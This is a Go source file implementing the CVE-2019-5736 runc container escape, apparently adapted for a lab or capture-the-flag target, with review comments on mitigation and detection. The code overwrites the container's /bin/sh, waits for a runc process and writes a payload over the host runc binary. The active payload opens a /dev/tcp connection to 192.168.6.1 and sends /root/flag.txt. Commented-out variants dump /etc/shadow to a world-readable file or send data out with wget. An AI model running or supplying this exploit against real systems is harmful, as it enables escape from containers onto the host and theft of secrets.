- package main
- // Implementation of CVE-2019-5736
- // Created with help from @singe, @_cablethief, and @feexd.
- // This commit also helped a ton to understand the vuln
- // https://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d
- // Modified by josevnz@yahoo.com
- import (
- "fmt"
- "io/ioutil"
- "os"
- "strconv"
- "strings"
- )
// payload is the script body that the code in main writes over the host runc
// binary once it has a writable descriptor to it. The two commented-out lines
// are earlier variants kept by the author; whichever is active runs on the host
// with runc's privileges, which is what makes this a container escape rather
// than an in-container problem.
// This is the line of shell commands that will execute on the host
// var payload = "#!/bin/bash \n cat /etc/shadow > /tmp/shadow && chmod 777 /tmp/shadow"
// var payload = "#!/bin/bash \n /usr/bin/wget http://192.168.6.1/`cat /root/flag.txt|base64`"
var payload = "#!/bin/bash \n exec 3<>/dev/tcp/192.168.6.1/8000 && cat /root/flag.txt >&3"
// main runs the CVE-2019-5736 sequence exactly as written in this paste:
//  1. replace the container's /bin/sh with a "#!/proc/self/exe" shebang;
//  2. busy-poll /proc until some process's cmdline contains "runc";
//  3. open that process's /proc/<pid>/exe and keep the descriptor;
//  4. repeatedly try to open /proc/self/fd/<n> for writing with O_TRUNC and,
//     once that succeeds, write payload over the binary behind it.
//
// Mitigation: patched runc (and the lxc commit cited in the file header) re-exec
// from a sealed in-memory copy of their own binary, so /proc/self/exe no longer
// names the writable host file; a read-only runc binary or read-only host root
// also stops the final write. Detection: a container process rewriting /bin/sh
// and then opening another process's /proc/<pid>/exe followed by
// /proc/self/fd/<n> with O_WRONLY|O_TRUNC is the observable sequence. Note that
// every error path below only prints and returns; nothing is cleaned up.
func main() {
	fmt.Println("[+] Started script..., payload:", payload)
	// First we overwrite /bin/sh with the /proc/self/exe interpreter path
	// (a shebang that resolves to whatever binary later executes /bin/sh).
	fd, err := os.Create("/bin/sh")
	if err != nil {
		fmt.Println("[-] Failed to overwrite /bin/sh")
		fmt.Println(err)
		return
	}
	fmt.Fprintln(fd, "#!/proc/self/exe")
	err = fd.Close()
	if err != nil {
		// NOTE(review): this message describes a different failure; the error
		// here comes from closing /bin/sh, not from /proc/self/exe.
		fmt.Println("[-] Cannot get fd for /proc/self/exe")
		fmt.Println(err)
		return
	}
	fmt.Println("[+] Overwritten /bin/sh successfully")
	// Loop through all processes to find one whose cmdline includes runcinit
	// This will be the process created by runc
	// The match is any cmdline containing "runc" (not specifically "runcinit"),
	// and a later match in the same pass of /proc overrides an earlier one.
	var found int
	for found == 0 {
		// err here shadows the outer err for the rest of this loop body.
		pids, err := ioutil.ReadDir("/proc")
		if err != nil {
			fmt.Println("[-] Cannot read /proc")
			fmt.Println(err)
			return
		}
		for _, f := range pids {
			// Read errors are ignored: non-PID entries and processes that
			// vanished mid-scan simply yield an empty cmdline.
			fbytes, _ := ioutil.ReadFile("/proc/" + f.Name() + "/cmdline")
			fstring := string(fbytes)
			if strings.Contains(fstring, "runc") {
				fmt.Println("[+] Found the PID:", f.Name())
				found, err = strconv.Atoi(f.Name())
				if err != nil {
					fmt.Println("[-] Cannot convert PID for runc")
					fmt.Println(err)
					return
				}
			}
		}
	}
	// We will use the pid to get a file handle for runc on the host.
	// The descriptor is never closed; it is only referenced below through
	// /proc/self/fd/<handleFd>.
	var handleFd = -1
	for handleFd == -1 {
		// Note, you do not need to use the O_PATH flag for the exploit to work.
		// On open failure handle is a nil *os.File; Fd() on a nil *os.File
		// reports an invalid descriptor, so the > 0 test fails and the loop
		// spins until the open succeeds.
		handle, _ := os.OpenFile("/proc/"+strconv.Itoa(found)+"/exe", os.O_RDONLY, 0777)
		if int(handle.Fd()) > 0 {
			handleFd = int(handle.Fd())
		}
	}
	fmt.Println("[+] Successfully got the file handle")
	// Now that we have the file handle, lets write to the runc binary and overwrite it
	// It will maintain it's executable flag
	// This spins until the write-open succeeds (presumably once the binary is
	// no longer busy being executed). The Write error is ignored, writeHandle
	// is never closed, and the program returns right after the single write.
	for {
		writeHandle, _ := os.OpenFile("/proc/self/fd/"+strconv.Itoa(handleFd), os.O_WRONLY|os.O_TRUNC, 0700)
		if int(writeHandle.Fd()) > 0 {
			fmt.Println("[+] Successfully got write handle", writeHandle)
			writeHandle.Write([]byte(payload))
			fmt.Println("[+] Wrote payload...")
			return
		}
	}
}